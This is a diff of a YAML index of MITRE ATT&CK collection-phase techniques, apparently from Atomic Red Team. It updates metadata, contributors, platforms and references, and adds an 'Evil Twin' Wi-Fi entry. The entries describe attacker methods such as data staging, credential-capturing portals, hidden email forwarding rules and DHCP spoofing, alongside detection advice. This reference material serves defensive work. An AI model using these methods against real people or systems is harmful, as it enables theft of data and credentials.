         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -44871,10 +45353,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -44885,13 +45369,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -44932,37 +45417,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -44973,23 +45432,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -45059,7 +45542,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -45094,7 +45576,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -45113,10 +45595,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -45145,7 +45706,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -45175,8 +45736,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -45230,7 +45789,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -45267,7 +45825,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -45295,12 +45853,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45337,23 +45893,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45386,21 +45942,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45508,12 +46063,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45524,13 +46078,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45544,6 +46098,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45554,12 +46109,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -45604,30 +46159,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -45637,31 +46173,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -45694,10 +46247,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -45706,16 +46261,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -45747,70 +46303,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -45883,7 +46435,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests:
     - name: AppleScript - Prompt User for Password
@@ -45966,12 +46517,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -45983,6 +46533,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -45990,11 +46543,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -46011,14 +46564,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -46034,6 +46584,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
